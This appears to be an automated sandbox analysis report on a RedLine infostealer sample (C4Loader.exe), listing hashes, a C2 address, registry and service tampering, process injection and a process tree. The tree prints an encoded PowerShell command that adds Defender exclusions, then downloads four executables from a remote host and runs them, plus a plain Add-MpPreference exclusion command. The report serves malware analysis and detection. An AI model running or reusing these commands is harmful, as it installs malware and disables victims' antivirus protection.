redline | 4b8e43a1cee980394eb2845ea6657b376746b84b52bbd3d2ea062cbdfb292d5d

Analysis

max time kernel
35s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

126KB
MD5

e755b7599fc8b631b954d2d80a3246cb
SHA1

0f557b0b356fc7b5462d252cccd19f93b2cc696a
SHA256

4b8e43a1cee980394eb2845ea6657b376746b84b52bbd3d2ea062cbdfb292d5d
SHA512

426bec87d3c521b99d34813d9953aa7eaebbbebc155056e3fe53f893c8fca7a9ee1c4657c192472c82323470388f1238a994ac6fb54ad3d7f2e42355229e2a7c
SSDEEP

3072:AWrLpduTeRflPTgZv6NV5GqZdPAxusJt6fgMvXM0jJ5Y7eyFNeVmlUOL18c:AUL4YpTV4mAxh6fDyFxL18c

Score

10^/10

redline 1 evasion infostealer

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2332-174-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1424-176-0x0000000000220000-0x000000000025E000-memory.dmp	family_redline
behavioral2/memory/1424-180-0x0000000000220000-0x000000000025E000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

SmartDefRun.exeSmartScreenQC.exe

description	pid	process	target process
PID 220 created 980	220	SmartDefRun.exe	Explorer.EXE
PID 220 created 980	220	SmartDefRun.exe	Explorer.EXE
PID 220 created 980	220	SmartDefRun.exe	Explorer.EXE
PID 220 created 980	220	SmartDefRun.exe	Explorer.EXE
PID 220 created 980	220	SmartDefRun.exe	Explorer.EXE
PID 2764 created 980	2764	SmartScreenQC.exe	Explorer.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 2316 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Executes dropped EXE 5 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exeSmartScreenQC.exe

pid process

4556 C4Loader.exe
1424 new2.exe
1416 SysApp.exe
220 SmartDefRun.exe
2764 SmartScreenQC.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

flow	pid	process
17	2316	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
4556	C4Loader.exe
1424	new2.exe
1416	SysApp.exe
220	SmartDefRun.exe
2764	SmartScreenQC.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4Loader.exenew2.exeSmartDefRun.exe

description	pid	process	target process
PID 2044 set thread context of 4312	2044	C4Loader.exe	vbc.exe
PID 1424 set thread context of 2332	1424	new2.exe	vbc.exe
PID 220 set thread context of 392	220	SmartDefRun.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3712 sc.exe
4168 sc.exe
2448 sc.exe
1676 sc.exe
3320 sc.exe
4036 sc.exe
5068 sc.exe
1236 sc.exe
2900 sc.exe
1936 sc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2432 2044 WerFault.exe C4Loader.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

pid	process
3712	sc.exe
4168	sc.exe
2448	sc.exe
1676	sc.exe
3320	sc.exe
4036	sc.exe
5068	sc.exe
1236	sc.exe
2900	sc.exe
1936	sc.exe

pid	pid_target	process	target process
2432	2044	WerFault.exe	C4Loader.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exepowershell.exeSmartScreenQC.exepowershell.EXEpowershell.EXEpowershell.exe

pid	process
2316	powershell.exe
2316	powershell.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
380	powershell.exe
380	powershell.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
2236	powershell.exe
2236	powershell.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
1416	SysApp.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
220	SmartDefRun.exe
5052	powershell.exe
5052	powershell.exe
2764	SmartScreenQC.exe
2764	SmartScreenQC.exe
5028	powershell.EXE
64	powershell.EXE
4384	powershell.exe
4384	powershell.exe
5028	powershell.EXE
64	powershell.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	380	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe
Token: 35	2236	powershell.exe
Token: 36	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe
Token: 35	2236	powershell.exe
Token: 36	2236	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	powershell.exe
Token: SeSecurityPrivilege	2236	powershell.exe
Token: SeTakeOwnershipPrivilege	2236	powershell.exe
Token: SeLoadDriverPrivilege	2236	powershell.exe
Token: SeSystemProfilePrivilege	2236	powershell.exe
Token: SeSystemtimePrivilege	2236	powershell.exe
Token: SeProfSingleProcessPrivilege	2236	powershell.exe
Token: SeIncBasePriorityPrivilege	2236	powershell.exe
Token: SeCreatePagefilePrivilege	2236	powershell.exe
Token: SeBackupPrivilege	2236	powershell.exe
Token: SeRestorePrivilege	2236	powershell.exe
Token: SeShutdownPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeSystemEnvironmentPrivilege	2236	powershell.exe
Token: SeRemoteShutdownPrivilege	2236	powershell.exe
Token: SeUndockPrivilege	2236	powershell.exe
Token: SeManageVolumePrivilege	2236	powershell.exe
Token: 33	2236	powershell.exe
Token: 34	2236	powershell.exe

Suspicious use of WriteProcessMemory 47 IoCs

Processes:

C4Loader.exevbc.exepowershell.exenew2.execmd.exeSmartDefRun.exepowershell.exe

description	pid	process	target process
PID 2044 wrote to memory of 4312	2044	C4Loader.exe	vbc.exe
PID 2044 wrote to memory of 4312	2044	C4Loader.exe	vbc.exe
PID 2044 wrote to memory of 4312	2044	C4Loader.exe	vbc.exe
PID 2044 wrote to memory of 4312	2044	C4Loader.exe	vbc.exe
PID 2044 wrote to memory of 4312	2044	C4Loader.exe	vbc.exe
PID 4312 wrote to memory of 2316	4312	vbc.exe	powershell.exe
PID 4312 wrote to memory of 2316	4312	vbc.exe	powershell.exe
PID 4312 wrote to memory of 2316	4312	vbc.exe	powershell.exe
PID 2316 wrote to memory of 4556	2316	powershell.exe	C4Loader.exe
PID 2316 wrote to memory of 4556	2316	powershell.exe	C4Loader.exe
PID 2316 wrote to memory of 4556	2316	powershell.exe	C4Loader.exe
PID 2316 wrote to memory of 1424	2316	powershell.exe	new2.exe
PID 2316 wrote to memory of 1424	2316	powershell.exe	new2.exe
PID 2316 wrote to memory of 1424	2316	powershell.exe	new2.exe
PID 2316 wrote to memory of 1416	2316	powershell.exe	SysApp.exe
PID 2316 wrote to memory of 1416	2316	powershell.exe	SysApp.exe
PID 2316 wrote to memory of 1416	2316	powershell.exe	SysApp.exe
PID 2316 wrote to memory of 220	2316	powershell.exe	SmartDefRun.exe
PID 2316 wrote to memory of 220	2316	powershell.exe	SmartDefRun.exe
PID 1424 wrote to memory of 2332	1424	new2.exe	vbc.exe
PID 1424 wrote to memory of 2332	1424	new2.exe	vbc.exe
PID 1424 wrote to memory of 2332	1424	new2.exe	vbc.exe
PID 1424 wrote to memory of 2332	1424	new2.exe	vbc.exe
PID 1424 wrote to memory of 2332	1424	new2.exe	vbc.exe
PID 2396 wrote to memory of 1236	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 1236	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 2900	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 2900	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 3712	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 3712	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 1936	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 1936	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 4168	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 4168	2396	cmd.exe	sc.exe
PID 2396 wrote to memory of 4004	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 4004	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 3344	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 3344	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 5092	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 5092	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 4536	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 4536	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 3772	2396	cmd.exe	reg.exe
PID 2396 wrote to memory of 3772	2396	cmd.exe	reg.exe
PID 220 wrote to memory of 392	220	SmartDefRun.exe	dialer.exe
PID 5052 wrote to memory of 1908	5052	powershell.exe	schtasks.exe
PID 5052 wrote to memory of 1908	5052	powershell.exe	schtasks.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:980

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:4556

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:2332

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1416

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 268
3⤵
- Program crash
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\System32\cmd.exe
